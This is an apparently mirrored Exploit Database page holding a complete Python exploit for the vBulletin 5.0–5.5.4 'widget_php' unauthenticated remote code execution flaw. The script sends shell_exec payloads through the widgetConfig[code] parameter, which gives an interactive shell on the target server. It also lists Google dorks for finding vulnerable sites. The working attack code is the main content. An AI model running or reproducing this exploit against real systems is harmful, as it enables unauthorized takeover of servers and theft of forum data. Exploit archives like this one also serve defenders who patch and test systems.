vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution

• Exploit Database
• 108 阅读

• 作者： anonymous
  日期： 2019-09-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47447/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  #!/usr/bin/python # # vBulletin 5.x 0day pre-auth RCE exploit # # This should work on all versions from 5.0.0 till 5.5.4 # # Google Dorks: # - site:*.vbulletin.net # - "Powered by vBulletin Version 5.5.4"   import requests import sys   if len(sys.argv) != 2: sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])   params = {"routestring":"ajax/render/widget_php"}   while True: try: cmd = raw_input("vBulletin$ ") params["widgetConfig[code]"] = "echo shell_exec(&apos;"+cmd+"&apos;); exit;" r = requests.post(url = sys.argv[1], data = params) if r.status_code == 200: print r.text else: sys.exit("Exploit failed! :(") except KeyboardInterrupt: sys.exit("\nClosing shell...") except Exception, e: sys.exit(str(e))